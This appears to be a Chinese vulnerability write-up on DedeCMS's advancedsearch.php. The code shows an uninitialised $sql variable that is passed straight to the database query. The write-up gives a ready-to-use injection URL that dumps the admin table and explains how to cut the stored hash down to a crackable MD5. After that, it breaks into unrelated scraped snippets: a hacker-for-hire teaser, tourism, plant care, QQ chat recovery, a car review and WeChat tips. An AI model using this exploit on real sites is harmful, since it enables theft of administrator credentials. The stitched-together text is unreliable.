漏洞描述:
健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。
plus/advancedsearch.php
$sql 变量未初始化。导致鸡助漏洞
复制代码代码如下:
if($mid == 0) //必须绕过。
{
showmsg('参数不正确,高级自定义搜索必须指定模型id', 'javascript');
exit();
}
$query = "select maintable, mainfields, addontable, addonfields, template from dede_advancedsearch where mid='$mid'";
$searchinfo = $dsql->GetOne($query);
if(!is_array($searchinfo)) //囧啊,绕过有难度。
{
showmsg('自定义搜索模型不存在','-1'); exit();
}
$template = $searchinfo['template'] != '' ? $searchinfo['template'] : 'advancedsearch.htm';
if(empty($sql)) //人品问题,成功绕过!{
..............
}else{
$sql = urldecode($sql);
$query = $sql;
}
$sql = urlencode($sql);
$dlist = new DataListCP();
$dlist->pageSize = 20;
$dlist->SetParameter("sql", $sql);
$dlist->SetParameter("mid", $mid);
...............
$dlist->SetTemplate($templatefile);
$dlist->SetSource($query);
.............<*参考
*>
测试 *** :
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码, *** 是,前减3后减1,得到16位MD5
一、我要找黑客帮忙 多少钱 1、找黑客帮忙要多少钱能帮你什么? 2、网络黑客,请一次多少钱?要相信你找得到的黑客,网络警察一定找得到,我想找个黑客帮我先回被骗的钱,今天被骗了两万多。不知道。我也想找...
永陵位于辽宁新宾县永陵镇,建于明万历二十六年(1598)。陵区占地约12000平方米,依山面水。陵内葬有清太祖努尔哈赤的远祖盖特穆、曾祖福满、祖父昌安。 永陵没什么太好的宾馆福满楼要是能住那价格比较高...
即便是有一段时间没有照顾它们,也能让它保持良好的生长状态,不过如果长时间没有照顾,叶子也会出现不断发黄干枯的状况。 那么为什么绿萝会出现这种叶子发黄干枯的状况呢? 1.浇水没有浇透 养在办公...
如何查看删除的QQ聊天记录?邻居家的小明前几天登录手机...
长安cs55动员机是合伙的吗? 此刻较量火热的SUV长安CS551, 外观大度,大气。2,1.5T动力很强,油门很敏感,超车无压力。3,空调很强劲,只在4几多S尝试了一下,风很大,制冷不错。4...
微信或许是咱们现在每天触摸最多的社交工具。 虽然每天都在运用,但仍有一些躲藏但实用的小功用还没有被咱们发现。 今天,九美将本着共享的精神,将这些平时或许会用到的小功用介绍给咱们。 最用心的小功用...